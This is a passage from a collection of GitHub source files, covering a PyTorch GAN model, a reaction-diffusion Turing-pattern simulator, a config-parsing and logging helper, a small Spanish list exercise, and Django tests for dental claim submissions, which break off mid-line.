self.leakyrelu2 = nn.LeakyReLU()\n self.dropout2 = nn.Dropout(0.3)\n\n self.fc = nn.Linear(128*7*7, 1)\n\n def forward(self, x):\n x = self.conv1(x)\n x = self.leakyrelu1(x)\n x = self.dropout1(x)\n # [N, 64, 14, 14]\n x = self.conv2(x)\n x = self.leakyrelu2(x)\n x = self.dropout2(x)\n # [N, 64, 7, 7]\n x = x.view((-1, 128*7*7))\n # [N, 128*7*7]\n x = self.fc(x)\n # [N, 1]\n\n return x\n\nif __name__ == '__main__':\n x = torch.randn((10, 100))\n\n g = Generator()\n\n y = g(x)\n\n d = Discriminator()\n\n x = d(y)","repo_name":"daveboat/torch_gan_example","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"18095268181","text":"\"\"\"\nPython Script for simulating Anisotropic Diffusion in a Reaction-Diffusion (RD) System.\n\n\nInspiration for various ways to use this system:\nhttps://itb.biologie.hu-berlin.de/~bordyugov/tut/TBM2010/pdf/vl1.pdf\n\nTODO: Incorporate stencil method for better derivatives (https://en.wikipedia.org/wiki/Five-point_stencil)\n\nOther Helpful Links:\nhttps://nbviewer.jupyter.org/github/barbagroup/CFDPython/blob/master/lessons/09_Step_7.ipynb\nhttp://apmonitor.com/che263/index.php/Main/PythonDynamicSim\nhttps://www.sympy.org/en/index.html\n\n\n\n\"\"\"\n\n\nimport numpy as np\nimport sys\n\n\nclass TuringSystem():\n def __init__(self, grid_size=150, step_size=.01, num_elements=2, dt = .001):\n self.grid_size = grid_size\n self.step_size = step_size\n self.num_elements = num_elements\n self.grid = self.initialize_grid()\n self.D_x = 1\n self.D_y = 1\n\n # Diffusion Coefficients for x and y directions, for the Laplacian (second derivative)\n self.D_xx = 1\n self.D_yy = 1\n\n self.dt = dt\n self.max_val = 1000000000000\n\n # def initialize_grid_sine(self):\n\n\n def average_value(self):\n \"\"\"\n Gets the average concentration values inside the grid, across all chemical species\n \"\"\"\n return np.average(self.grid)\n\n def normalize_grid(self):\n \"\"\"\n Scales the grid by the average value of the grid\n\n \"\"\"\n self.grid = self.grid / self.average_value()\n\n def clip_grid(self):\n self.grid = np.clip(self.grid, -self.max_val, self.max_val)\n\n\n def initialize_grid(self):\n \"\"\"\n Creates a grid of random size\n \"\"\"\n grid = np.random.rand(self.grid_size, self.grid_size, self.num_elements)\n return grid\n\n def step(self, h):\n \"\"\"\n Updates the internal grid\n \"\"\"\n pass\n\n def viewable_grid(self):\n \"\"\"\n Returns the grid without the edges padded\n \"\"\"\n # return self.grid[1:-1, 1:-1]\n return self.grid\n\n def first_derivative(self, h):\n \"\"\"\n Computes the first derivative with respect to space across a given grid.\n\n Does so using the centered-difference method. Error decays as the square of the step size.\n \"\"\"\n # new_grid = np.zeros_like(grid)\n grid = np.pad(self.grid, (1, 1), 'constant')[:, :, 1:-1]\n\n grid[0, :] = grid[1, :]\n grid[-1, :] = grid[-2, :]\n grid[:, 0] = grid[:, 1]\n grid[:, -1] = grid[:, -2]\n\n\n above = grid[0:-2, 1:-1]\n below = grid[2:, 1:-1]\n left = grid[1:-1, 0:-2]\n right = grid[1:-1, 2:]\n center = grid[1:-1, 1:-1]\n dx = self.D_x * (right - left) / (2 * h)\n dy = self.D_y * (above - below) / (2 * h)\n return dx + dy\n\n def second_derivative(self, h):\n \"\"\"\n Computes the second derivative with respect to space across a given grid.\n\n Does so using the centered-difference method. Error decays as the square of the step size.\n\n Implements neumann boundary conditions as well.\n \"\"\"\n grid = np.pad(self.grid, (1, 1), 'constant')[:, :, 1:-1]\n\n grid[0, :] = grid[1, :]\n grid[-1, :] = grid[-2, :]\n grid[:, 0] = grid[:, 1]\n grid[:, -1] = grid[:, -2]\n\n\n above = grid[0:-2, 1:-1]\n below = grid[2:, 1:-1]\n left = grid[1:-1, 0:-2]\n right = grid[1:-1, 2:]\n center = grid[1:-1, 1:-1]\n dxx = self.D_xx * (left + right - 2 * center) / (h ** 2)\n dyy = self.D_yy * (above + below - 2 * center) / (h ** 2)\n return dxx + dyy\n\n def second_derivative_five_point_stencil(self, h):\n print(self.grid.shape)\n grid = np.pad(self.grid, (2, 2), 'constant')[:, :, 2:-2]\n\n left = grid[2:-2, 1:-3]\n left_second = grid[2:-2, 0:-4]\n\n right = grid[2:-2, 3:-1]\n right_second = grid[2:-2, 4:]\n\n above = grid[1:-3, 2:-2]\n above_second = grid[0:-4, 2:-2]\n\n below = grid[3:-1, 2:-2]\n below_second = grid[4:, 2:-2]\n\n center = grid[2:-2, 2:-2]\n\n dxx = (-left_second + 16 * left - 30 * center + 16 * right - right_second) / (12 * h ** 2)\n dyy = (-below_second + 16 * below - 30 * center + 16 * above - above_second) / (12 * h ** 2)\n\n return dxx + dyy\n\nclass OriginalSystem(TuringSystem):\n def __init__(self, **kwargs):\n super().__init__(**kwargs, num_elements=2)\n\n def local_interactions_nonlinear(self):\n \"\"\"\n Calculates nonlinear local interactions at each point within the grid.\n Comes from a Jupyter notebook found at: https://ipython-books.github.io/124-simulating-a-partial-differential-equation-reaction-diffusion-systems-and-turing-patterns/\n\n \"\"\"\n grid = self.grid\n k = -.005\n tau = .1\n grid_copy = np.zeros_like(grid)\n grid_copy[:, :, 0] = grid[:, :, 0] - np.power(grid[:, :, 0], 3) - grid[:, :, 1] - k\n grid_copy[:, :, 1] = (grid[:, :, 0] - grid[:, :, 1])\n return grid_copy\n\n def step(self, h):\n \"\"\"\n This is where the governing equations of the system are defined.\n \"\"\"\n grid = self.grid\n # padded_grid = np.pad(grid, (1, 1), 'constant')[:, :, 1:-1]\n\n # Defines how the system will update over time\n\n du = self.dt * (self.second_derivative(h) + self.local_interactions_nonlinear()) * [1, 10]\n\n # Update the grid\n self.grid += du\n\nclass Schnakenberg(TuringSystem):\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.D_u = 1\n self.D_v = 10\n self.gamma = 1000\n self.a = 0.126779\n self.b = 0.792366\n\n def local_interactions_nonlinear(self):\n u = self.grid[:, :, 0]\n v = self.grid[:, :, 1]\n grid_copy = np.zeros_like(self.grid)\n grid_copy[:, :, 0] = self.gamma * (self.a - u + (u ** 2) * v)\n grid_copy[:, :, 1] = self.gamma * (self.b - (u ** 2) * v)\n return grid_copy\n\n def step(self, h):\n du = self.dt * (self.second_derivative(h) * [self.D_u, self.D_v] + self.local_interactions_nonlinear())\n\n self.grid += du\n\nclass GM(TuringSystem):\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.D_u = .000945 * 40\n self.D_v = .27 * 40\n self.r = .001\n self.mu = 2.5\n self.alpha = 100\n\n def local_interactions_nonlinear(self):\n u = self.grid[:, :, 0]\n v = self.grid[:, :, 1]\n grid_copy = np.zeros_like(self.grid)\n grid_copy[:, :, 0] = self.r * u ** 2 / v - self.mu * u + self.r\n # u = grid_copy[:, :, 0]\n # print(u)\n grid_copy[:, :, 1] = self.r * u ** 2 - self.alpha * v\n return grid_copy\n\n def step(self, h):\n # padded_grid = np.pad(grid, (2, 2), 'constant')[:, :, 2:-2]\n du = self.dt * (self.second_derivative(h) * [self.D_u, self.D_v] + self.local_interactions_nonlinear())\n\n self.grid += du\n\nclass GMSC(TuringSystem):\n def __init__(self, **kwargs):\n super().__init__(**kwargs, num_elements=4)\n # print(self.grid.shape)\n # print(self.num_elements)\n self.D_u_gm = .000945\n self.D_v_gm = .27\n self.r = .001\n self.mu = 2.5\n self.alpha = 100\n\n self.D_u_sc = 1\n self.D_v_sc = 10\n self.gamma = 1000\n self.a = 0.126779\n self.b = 0.792366\n\n self.D_pigment_1 = 1\n self.D_pigment_2 = 1\n self.pigment_1_decay = .01\n self.pigment_2_decay = .01\n\n def local_interactions_nonlinear(self):\n u_gm = self.grid[:, :, 0]\n v_gm = self.grid[:, :, 1]\n u_sc = self.grid[:, :, 2]\n v_sc = self.grid[:, :, 3]\n\n # pigment_1 = self.grid[:, :, 4]\n # pigment_2 = self.grid[:, :, 5]\n\n grid_copy = np.zeros_like(self.grid)\n\n # GM Portion\n grid_copy[:, :, 0] = (self.r * u_gm ** 2 / v_gm - self.mu * u_gm + self.r) * (u_sc)\n grid_copy[:, :, 1] = (self.r * u_gm ** 2 - self.alpha * v_gm) * (v_sc)\n\n # SC Portion\n grid_copy[:, :, 2] = self.gamma * (self.a - u_sc + (u_sc ** 2) * v_sc)\n grid_copy[:, :, 3] = self.gamma * (self.b - (u_sc ** 2) * v_sc)\n\n # grid_copy[:, :, 4] = v_gm - self.pigment_1_decay * pigment_1 ** 2\n # grid_copy[:, :, 5] = u_sc - self.pigment_2_decay * pigment_2 ** 2\n\n return grid_copy\n\n def step(self, h):\n # padded_grid = np.pad(grid, (2, 2), 'constant')[:, :, 2:-2]\n du = self.dt * (self.second_derivative(h) * [self.D_u_gm, self.D_v_gm, self.D_u_sc, self.D_v_sc] + self.local_interactions_nonlinear())\n\n self.grid += du\n\nclass DoubleSC(TuringSystem):\n def __init__(self, **kwargs):\n super().__init__(**kwargs, num_elements=4)\n\n self.D_u_sc_1 = .1\n self.D_v_sc_1 = 1\n self.gamma = 1000\n self.a = 0.126779\n self.b = 0.792366\n\n self.D_u_sc_2 = 1\n self.D_v_sc_2 = 10\n self.gamma = 1000\n self.a = 0.126779\n self.b = 0.792366\n\n def local_interactions_nonlinear(self):\n u_sc_1 = self.grid[:, :, 0]\n v_sc_1 = self.grid[:, :, 1]\n u_sc_2 = self.grid[:, :, 2]\n v_sc_2 = self.grid[:, :, 3]\n\n # pigment_1 = self.grid[:, :, 4]\n # pigment_2 = self.grid[:, :, 5]\n\n grid_copy = np.zeros_like(self.grid)\n\n # First SC Portion\n grid_copy[:, :, 0] = self.gamma * (self.a - u_sc_1 + (u_sc_1 ** 2) * v_sc_1) * (u_sc_2)\n grid_copy[:, :, 1] = self.gamma * (self.b - (u_sc_1 ** 2) * v_sc_1) * (v_sc_2)\n\n # Second SC Portion\n grid_copy[:, :, 2] = self.gamma * (self.a - u_sc_2 + (u_sc_2 ** 2) * v_sc_2)\n grid_copy[:, :, 3] = self.gamma * (self.b - (u_sc_2 ** 2) * v_sc_2)\n\n # grid_copy[:, :, 4] = v_gm - self.pigment_1_decay * pigment_1 ** 2\n # grid_copy[:, :, 5] = u_sc - self.pigment_2_decay * pigment_2 ** 2\n\n return grid_copy\n\n def step(self, h):\n # padded_grid = np.pad(grid, (2, 2), 'constant')[:, :, 2:-2]\n du = self.dt * (self.second_derivative(h) * [self.D_u_sc_1, self.D_v_sc_1, self.D_u_sc_2, self.D_v_sc_2] + self.local_interactions_nonlinear())\n\n self.grid += du\n\nclass AnisotropicSchnakenberg(TuringSystem):\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.D_u = 1\n self.D_v = 10\n self.gamma = 1000\n self.a = 0.126779\n self.b = 0.792366\n self.D_xx = 20\n self.D_yy = .3\n\n def local_interactions_nonlinear(self):\n u = self.grid[:, :, 0]\n v = self.grid[:, :, 1]\n grid_copy = np.zeros_like(self.grid)\n grid_copy[:, :, 0] = self.gamma * (self.a - u + (u ** 2) * v)\n grid_copy[:, :, 1] = self.gamma * (self.b - (u ** 2) * v)\n return grid_copy\n\n def step(self, h):\n du = self.dt * (self.second_derivative(h) * [self.D_u, self.D_v] + self.local_interactions_nonlinear())\n\n self.grid += du\n\nclass Latch(TuringSystem):\n def __init__(self, **kwargs):\n super().__init__(**kwargs, num_elements=3)\n self.D_u = 1\n self.D_v = 10\n self.D_a = 50\n self.gamma = 1000\n self.a = 0.126779\n self.b = 0.792366\n\n self.diffusion_coefficient_array = [self.D_u, self.D_v, self.D_a][:self.num_elements]\n\n # self.num_iterations = 0\n # self.turning_point = 50\n\n def remove_activator(self):\n self.grid[:, :, 2] = np.zeros_like(self.grid[:, :, 2])\n\n def unexpose_activator(self):\n self.grid[:, 0:30, 2] = np.zeros_like(self.grid[:, 0:30, 2])\n\n def expose_activator(self, val=1):\n self.grid[:, 1, 2] += val\n\n def local_interactions_nonlinear(self):\n u = self.grid[:, :, 0]\n v = self.grid[:, :, 1]\n activator = self.grid[:, :, 2]\n inhibitor = self.grid[:, :, 3]\n\n grid_copy = np.zeros_like(self.grid)\n grid_copy[:, :, 0] = self.gamma * (self.a - u + (u ** 2) * v)\n grid_copy[:, :, 1] = self.gamma * (self.b - (u ** 2) * v)\n return grid_copy\n\n def step(self, h):\n # padded_grid = np.pad(grid, (2, 2), 'constant')[:, :, 2:-2]\n du = self.dt * (self.second_derivative(h) * self.diffusion_coefficient_array + self.local_interactions_nonlinear())\n\n self.grid += du\n\nclass Oscillatory(TuringSystem):\n\n def __init__(self, **kwargs):\n \"\"\"\n https://people.maths.ox.ac.uk/maini/PKM%20publications/225.pdf\n\n \"\"\"\n super().__init__(**kwargs)\n self.D = .516\n self.delta = 4\n self.alpha = .899\n self.beta = -.91\n self.r2 = 2\n self.r3 = 3.5\n\n\n def local_interactions_nonlinear(self):\n u = self.grid[:, :, 0]\n v = self.grid[:, :, 1]\n grid_copy = np.zeros_like(self.grid)\n grid_copy[:, :, 0] = self.alpha * u + v - self.alpha * self.r3 * u * v ** 2 - self.r2 * u * v\n grid_copy[:, :, 1] = self.beta * v - self.alpha * u + self.alpha * self.r3 * u * v ** 2 + self.r2 * u * v\n return grid_copy\n\n def step(self, h):\n # padded_grid = np.pad(grid, (2, 2), 'constant')[:, :, 2:-2]\n du = self.dt * (self.second_derivative(h) * [self.D * self.delta, self.delta] + self.local_interactions_nonlinear())\n\n self.grid += du\n\n\n\nclass FiveElementCoupled(TuringSystem):\n def __init__(self, **kwargs):\n \"\"\"\n http://hopf.chem.brandeis.edu/pubs/pub288%20rep.pdf\n\n \"\"\"\n super().__init__(**kwargs, num_elements=5)\n\n # # First Parameters:\n # self.D_x = .17\n # self.D_z = .17\n # self.D_r = 6\n # self.D_u = .5\n # self.D_w = 12\n # self.f = 1.4\n # self.f_bar = 1.1\n # self.q = .01\n # self.q_bar = .01\n # self.epsilon = .23\n # self.epsilon_bar = .5\n # self.delta = 2 * self.epsilon\n # self.delta_bar = 2 * self.epsilon_bar\n\n # # Second Parameters:\n self.D_x = .1\n self.D_z = .1\n self.D_r = .1\n self.D_u = 3\n self.D_w = 100\n self.f = 1.1\n self.f_bar = 0.65\n self.q = .01\n self.q_bar = .01\n self.epsilon = .215\n self.epsilon_bar = .5\n self.delta = 2 * self.epsilon\n self.delta_bar = 2 * self.epsilon_bar\n\n def F(self, x, z):\n return (1 / self.epsilon) * (x - x ** 2 - self.f * z * ((x - self.q) / (x + self.q)))\n\n def G(self, x, z):\n return x - z\n\n def F_bar(self, x, z):\n return (1 / self.epsilon_bar) * (x - x ** 2 - self.f_bar * z * ((x - self.q_bar) / (x + self.q_bar)))\n\n def local_interactions_nonlinear(self):\n x = self.grid[:, :, 0]\n z = self.grid[:, :, 1]\n r = self.grid[:, :, 2]\n u = self.grid[:, :, 3]\n w = self.grid[:, :, 4]\n\n grid_copy = np.zeros_like(self.grid)\n grid_copy[:, :, 0] = self.F(x, z) - (1 / self.delta) * (x - r)\n grid_copy[:, :, 1] = self.G(x, z)\n grid_copy[:, :, 2] = (1 / self.delta) * (x - r) + (1 / self.delta_bar) * (u - r)\n grid_copy[:, :, 3] = self.F_bar(u, w) - (1 / self.delta_bar) * (u - r)\n grid_copy[:, :, 4] = self.G(u, w)\n\n return grid_copy\n\n def step(self, h):\n # padded_grid = np.pad(grid, (2, 2), 'constant')[:, :, 2:-2]\n du = self.dt * (self.second_derivative(h) * [self.D_x, self.D_z, self.D_r, self.D_u, self.D_w] + self.local_interactions_nonlinear())\n\n self.grid += du\n\nclass SimpleSystem(TuringSystem):\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.D_u = 1\n self.D_v = 1\n self.a = 3\n self.b = 2\n self.c = 2\n self.d = 1\n\n def local_interactions_nonlinear(self):\n u = self.grid[:, :, 0]\n v = self.grid[:, :, 1]\n grid_copy = np.zeros_like(self.grid)\n grid_copy[:, :, 0] = self.a * u - self.b * v\n grid_copy[:, :, 1] = self.c * u - self.d * v\n return grid_copy\n\n def step(self, h):\n # padded_grid = np.pad(grid, (2, 2), 'constant')[:, :, 2:-2]\n du = self.dt * (self.second_derivative(h) * [self.D_u, self.D_v] + self.local_interactions_nonlinear())\n\n self.grid += du\n","repo_name":"Jomanw/ReactionDiffusion","sub_path":"turing_system.py","file_name":"turing_system.py","file_ext":"py","file_size_in_byte":16129,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"34664433466","text":"import numpy as np\nimport sys\nimport configparser\nimport os\nimport __main__\nimport datetime\nimport hashlib\nVERSION=\"1.5.1\"\n\n\n\nclass Input(object):\n \"\"\"Parser to read inputfiles and create logs.\n\n Example usage:\\n\n import argparse\n VERSION=\"1.1\"\n par=argparse.ArgumentParser()\n par.add_argument('infile')\n par.add_argument('number', type=int)\n par.add_argument('-s',action='store_true')\n args=par.parse_args()\n inp=Inp.Input(args.infile,version=VERSION)\n inp.convert_type(int, \"option2\")\n \"\"\"\n\n def __init__(self,infilename, version, def_opts={}):\n \"\"\"Create Input parser.\n\n Arguments:\n object {Input} -- the parser object\\n\n infilename {str} -- the file with the input options. Set to 'None' if not given.\\n\n version {str} -- version of the program\\n\n\n Keyword Arguments:\n def_opts {dict} -- dictionary with default input options and values. (default: {{}})\n \"\"\"\n self.filename=infilename\n self.version=version\n self.options={}\n self.config = configparser.ConfigParser()\n self.config._interpolation = configparser.ExtendedInterpolation()\n self.outfilename=[]\n for sec in def_opts:\n # self.options[sec]={}\n self.config.add_section(sec)\n for key in def_opts[sec]:\n # self.options[sec][key]=def_opts[sec][key]\n self.config.set(sec, key, def_opts[sec][key])\n if infilename is not None:\n with open(infilename) as f:#Check for existence\n pass\n self.config.read(infilename)\n for sec in self.config:\n if not (sec in self.options):\n self.options[sec]={}\n for key in self.config[sec]:\n self.options[sec][key]=self.config[sec][key]\n\n def getKey(self, option, section):\n \"\"\"Check the existence of the given keys and choose defaults if they are 'None'.\"\"\"\n if section==None:\n section=\"DEFAULT\"#possibility to specify standard section\n if option==None:\n option=list(self.options[section].keys())[0]#possibility to specify standard option\n option=option.lower()\n return option, section\n\n def listKeys(self, section):\n \"\"\"Return all keys in a given section\n \n Arguments:\n section {key} -- The key of the section\n \n Returns:\n dict_keys -- The keys available within the section.\n \"\"\"\n if section==None:\n section==\"DEFAULT\"\n return self.options[section].keys()\n def get(self, option=None,section=None):\n \"\"\"Return the specified option.\n\n Keyword Arguments:\n option {string} -- The option to be returned. (default: {First option})\n section {string} -- The section where the option is located. (default: {First section})\n\n Returns:\n value -- value for the given option in the given section \n \"\"\"\n option, section=self.getKey(option, section)\n return self.options[section][option]\n\n def set(self, value, option=None, section=None):\n \"\"\"Set an option to a specific value.\n\n Arguments:\n value {obj} -- Value to be placed in the options dictionary.\n\n Keyword Arguments:\n option {str} -- Option to be set. (default: {None})\n section {str} -- Section where the option is located. (default: {None})\n \"\"\"\n option, section=self.getKey(option, section)\n self.options[section][option]=value\n\n def convert_type(self, dtype, option=None, section=None):\n \"\"\"Convert an input option from string to a given type.\n\n Arguments:\n dtype {type} -- Either int, float, or bool.\n\n Keyword Arguments:\n option {string} -- The option to be converted. (default: {None})\n section {string} -- The section where the option is located (default: {None})\n \"\"\"\n option, section=self.getKey(option, section)\n myDict={int: lambda sec, opt: int(self.get(opt, sec)), float: lambda sec, opt: float(self.get(opt, sec)), bool: lambda sec, opt: self.get(opt, sec).lower() in (\"true\", \"yes\", \"1\", \"t\")}\n self.set(myDict.get(dtype)(section, option),option=option, section=section)\n\n def convert_array(self, dtype, option=None, section=None, sep=\",\", removeSpaces=False):\n \"\"\"Convert an input option from string to an array of the given type.\n\n Arguments:\n dtype {type} -- Type to convert the array element, e.g. str, int, float\n\n Keyword Arguments:\n option {string} -- The option to be converted. (default: {None})\n section {string } -- The section where the option is located (default: {None})\n sep {string} -- The separator between the array values (default: {\",\"})\n removeSpaces {bool} -- Remove spaces in the elements when converting to string array. (default: {False})\n \"\"\"\n option, section=self.getKey(option, section)\n if dtype==str:\n array=self.options[section][option].split(sep)\n if removeSpaces:\n array=[x.strip() for x in array]\n array=[a for a in array if a]\n else:\n array=np.fromstring(self.options[section][option], sep=sep, dtype=dtype)\n self.set(array, option, section)\n \n def add_outfile(self, output_files):\n \"\"\"Add the name of the outputfiles of your program. They will be listed in the logfile, together with their hash value.\n \n Arguments:\n output_files {string or list of strings} -- The paths of the outputfiles. Relative paths will be interpreted relative to the currend working directory.\n \"\"\"\n output_files=np.atleast_1d(output_files)\n for path in output_files:\n abspath=os.path.abspath(path)\n if not os.path.isfile(abspath):\n print(\"WARNING: at the moment, there is no such file: \"+abspath)\n self.outfilename.append(abspath)\n\n def hash_file(self, file):\n \"\"\"Calculate the hash of a file.\n \n Arguments:\n file {str} -- The path of the file\n \n Returns:\n str -- The hexadecimal sha256 hash of the file.\n \"\"\"\n BLOCK_SIZE = 65536 # The size of each read from the file\n file_hash = hashlib.sha256() # Create the hash object, can use something other than `.sha256()` if you wish\n with open(file, 'rb') as f: # Open the file to read it's bytes\n fb = f.read(BLOCK_SIZE) # Read from the file. Take in the amount declared above\n while len(fb) > 0: # While there is still data being read from the file\n file_hash.update(fb) # Update the hash\n fb = f.read(BLOCK_SIZE) # Read the next block from the file\n return file_hash.hexdigest() # Get the hexadecimal digest of the hash\n\n def create_log(self):\n \"\"\"Create a log of the Input object.\n\n Example:\n Program: Progam1.py\n Version: 1.0.0\n Input options: Config1.ini\n **************************\n ---DEFAULT---\n **************************\n ---Sec1---\n user: 1.0\n\n Returns:\n array -- array with lines including linebreak.\n \"\"\"\n log=[]\n log.append(\"#\"+str(datetime.datetime.now()))\n log.append(\"cd \"+os.getcwd())\n log.append(\"python3 \"+\" \".join(sys.argv))\n log.append(\"#Program: \"+__main__.__file__)\n log.append(\"#Version: \"+str(self.version))\n log.append(\"#Input options: \"+str(self.filename))\n log.append(\"#**************************\")\n for sec in self.options.keys():\n log.append(\"#---\"+str(sec)+\"---\")\n for opt in self.options[sec].keys():\n log.append(\"#\"+str(opt)+\": \" + str(self.get(opt,sec)))\n if len(self.outfilename)>0:\n log.append(\"#**************************\")\n log.append(\"#Output files created:\")\n for path in self.outfilename:\n log.append(\"#%PATH% \"+path)\n log.append(\"#%HASH% \"+self.hash_file(path))\n log=[l+\"\\n\" for l in log]\n return log\n\n def show_data(self):\n \"\"\"Print log.\"\"\"\n print(*self.create_log())\n\n def check(self):\n \"\"\"Perform a consistency check on the input options.\"\"\"\n everything_ok=True\n #if(something_wrong):\n # everything_oK=False\n return everything_ok\n\n def write_log(self, new_logs, old_logs=[], file_ext=None):\n \"\"\"Write log to files.\n\n Combine all old logfiles, append the log of the actual program and save them to all new locations given.\n\n Arguments:\n old_logs {arr} -- array with old logfiles\n new_logs {arr} -- array with new logfiles to be created.\n\n Keyword Arguments:\n file_ext {str} -- if set, the file extensions in the given logfile locations are replaced by 'file_ext' before the function is executed. (default: {None})\n \"\"\"\n old_logs=np.atleast_1d(old_logs)\n new_logs=np.atleast_1d(new_logs)\n if file_ext!=None:\n file_ext=file_ext.strip(\".\")\n old_logs=[os.path.splitext(logfile)[0]+\".\"+file_ext for logfile in old_logs]\n new_logs=[os.path.splitext(logfile)[0]+\".\"+file_ext for logfile in new_logs]\n\n old_lines=[]\n log=self.create_log()\n for old in old_logs:\n oldfile=open(old)\n old_lines.extend(oldfile.readlines())\n oldfile.close()\n # old_lines=[l for l in old_lines]\n for new in new_logs:\n newfile=open(new, \"w\")\n newfile.writelines(old_lines)\n newfile.write(\"#####################################################################################\\n\")\n newfile.write(f\"#####{os.path.basename(new)} in {os.path.dirname(new)}######\\n\")\n newfile.writelines(log)\n newfile.close()\n\n\n","repo_name":"Ockenfuss/CodeTemplates","sub_path":"MyPython/inlog/Input.py","file_name":"Input.py","file_ext":"py","file_size_in_byte":10066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"27228523020","text":"numeros = [1, 2, 3, 4, 5]\r\nnumeros.append('hola')\r\n\r\nnumeros.pop(5)\r\n\r\nnumeros [1, 2, 3, 4, 5]\r\n'hola' + ' ' + 'mundo'\r\n\r\n\r\nnumeros2 = [6, 7, 8, 9]\r\n\r\nlista_final = numeros + numeros2 \r\n\r\nmi_tupla = (1,2,3,4,5)\r\n","repo_name":"SlevenLio21/Practicas_Python","sub_path":"Tuplas.py","file_name":"Tuplas.py","file_ext":"py","file_size_in_byte":212,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"20824141374","text":"import datetime\nfrom unittest.mock import patch\nfrom opal.core.test import OpalTestCase\nfrom opal.models import Episode, Ethnicity\nfrom odonto.odonto_submissions import models\nfrom odonto.episode_categories import FP17Episode, FP17OEpisode\nfrom odonto.odonto_submissions.management.commands import send_submissions\n\nBASE_STR = \"odonto.odonto_submissions.management.commands.send_submissions\"\n\n\n@patch(BASE_STR + \".models.Submission.send\")\n@patch(BASE_STR + \".logger\")\nclass SendSubmissionEmailTestCase(OpalTestCase):\n \"\"\"\n Tests the summary email that get's sent out of everything that\n has been sent downstream\n \"\"\"\n def setUp(self):\n Ethnicity.objects.create(name=\"Other mixed background\")\n self.cmd = send_submissions.Command()\n self.patient, self.episode = self.new_patient_and_episode_please()\n self.episode.stage = \"Submitted\"\n self.episode.save()\n self.today = datetime.date.today()\n self.yesterday = self.today - datetime.timedelta(1)\n\n def test_success_fp17(self, logger, send_submission):\n Episode.objects.update(category_name=FP17Episode.display_name)\n self.cmd.handle()\n send_submission.assert_called_once_with(self.episode)\n\n def test_fail_fp17(self, logger, send_submission):\n send_submission.side_effect = ValueError(\"boom\")\n Episode.objects.update(category_name=FP17Episode.display_name)\n self.cmd.handle()\n send_submission.assert_called_once_with(self.episode)\n self.assertEqual(\n logger.info.call_args_list[1][0][0],\n f\"Sending failed for Episode {self.episode.id} with boom\"\n )\n\n def test_success_fp17o(self, logger, send_submission):\n self.episode.category_name = FP17OEpisode.display_name\n self.episode.save()\n self.patient.demographics_set.update(ethnicity_fk_id=Ethnicity.objects.first().id)\n self.episode.orthodonticassessment_set.update(\n date_of_referral=self.yesterday, date_of_assessment=self.today\n )\n Episode.objects.update(category_name=FP17OEpisode.display_name)\n self.cmd.handle()\n send_submission.assert_called_once_with(self.episode)\n\n def test_fail_fp17o(self, logger, send_submission):\n send_submission.side_effect = ValueError(\"boom\")\n self.episode.category_name = FP17OEpisode.display_name\n self.episode.save()\n self.patient.demographics_set.update(ethnicity_fk_id=Ethnicity.objects.first().id)\n self.episode.orthodonticassessment_set.update(\n date_of_referral=self.yesterday, date_of_assessment=self.today\n )\n Episode.objects.update(category_name=FP17OEpisode.display_name)\n self.cmd.handle()\n self.assertEqual(\n logger.info.call_args_list[1][0][0],\n f\"Sending failed for Episode {self.episode.id} with boom\"\n )\n\n def test_none(self, logger, send_submission):\n Episode.objects.all().delete()\n self.assertFalse(send_submission.called)\n\n\nclass SendSubmissionGetQSTestCase(OpalTestCase):\n \"\"\"\n Tests that the correct episodes are being sent downstream\n \"\"\"\n def setUp(self):\n self.cmd = send_submissions.Command()\n self.patient, self.fp17_episode = self.new_patient_and_episode_please()\n today = datetime.date.today()\n\n # an fp17 episode ready to be submitted\n self.fp17_episode.stage = FP17Episode.SUBMITTED\n self.fp17_episode.category_name = FP17Episode.display_name\n self.fp17_episode.save()\n\n # an fp17o episode ready to be submitted\n self.fp17o_episode = self.patient.create_episode()\n self.fp17o_episode.stage = FP17OEpisode.SUBMITTED\n self.fp17o_episode.category_name = FP17OEpisode.display_name\n self.fp17o_episode.save()\n Ethnicity.objects.create(name=\"Other mixed background\")\n self.fp17o_episode.patient.demographics_set.update(\n ethnicity_fk_id=Ethnicity.objects.first().id\n )\n self.fp17o_episode.orthodonticassessment_set.update(\n date_of_assessment=today,\n date_of_referral=today\n )\n self.fp17o_episode.orthodontictreatment_set.update(\n date_of_completion=None\n )\n\n def test_get_fp17os_success(self):\n self.assertEqual(\n self.cmd.get_fp17os()[0],\n self.fp17o_episode\n )\n\n def test_get_fp17os_category(self):\n self.fp17o_episode.category_name = FP17Episode.display_name\n self.fp17o_episode.save()\n self.assertEqual(len(self.cmd.get_fp17os()), False)\n\n def test_get_fp17os_submitted(self):\n self.fp17o_episode.stage = FP17OEpisode.OPEN\n self.fp17o_episode.save()\n self.assertEqual(len(self.cmd.get_fp17os()), False)\n\n def test_get_fp17_qs_success(self):\n self.assertEqual(\n self.cmd.get_fp17_qs().get(),\n self.fp17_episode\n )\n\n def test_get_fp17_qs_category(self):\n self.fp17_episode.category_name = FP17OEpisode.display_name\n self.fp17_episode.save()\n self.assertFalse(self.cmd.get_fp17_qs().exists())\n\n def test_get_fp17_qs_submitted(self):\n self.fp17_episode.stage = FP17OEpisode.OPEN\n self.fp17_episode.save()\n self.assertFalse(self.cmd.get_fp17_qs().exists())\n\n\nclass FilterForNewOrFailedSinceTestCase(OpalTestCase):\n def setUp(self):\n self.cmd = send_submissions.Command()\n self.patient, self.fp17_episode = self.new_patient_and_episode_please()\n self.this_year = datetime.date(2020, 4, 1)\n self.last_year = datetime.date(2019, 4, 1)\n\n # an fp17 episode ready to be submitted\n self.fp17_episode.stage = FP17Episode.SUBMITTED\n self.fp17_episode.category_name = FP17Episode.display_name\n self.fp17_episode.save()\n\n def test_return_failed_this_tax_year(self):\n self.fp17_episode.fp17incompletetreatment_set.update(\n completion_or_last_visit=self.this_year\n )\n self.fp17_episode.submission_set.create(\n state=models.Submission.REJECTED_BY_COMPASS\n )\n result = 